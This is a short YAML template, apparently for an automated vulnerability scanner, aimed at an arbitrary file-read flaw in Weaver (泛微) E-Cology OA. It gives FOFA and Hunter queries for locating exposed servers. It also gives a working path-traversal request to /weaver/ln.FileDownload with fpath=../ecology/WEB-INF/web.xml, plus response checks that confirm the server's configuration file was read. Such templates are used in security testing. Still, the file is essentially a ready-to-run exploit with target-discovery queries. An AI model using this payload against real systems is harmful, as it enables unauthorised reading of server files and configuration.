product: 泛微 E-Cology
vName: 泛微E-Cology filedownload文件存在任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 泛微 E-Cology filedownload文件存在任意文件读取
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
  Hunter: app.name="泛微 e-cology 9.0 OA"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17677229.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <web-app
              - <filter-name>
            logic: and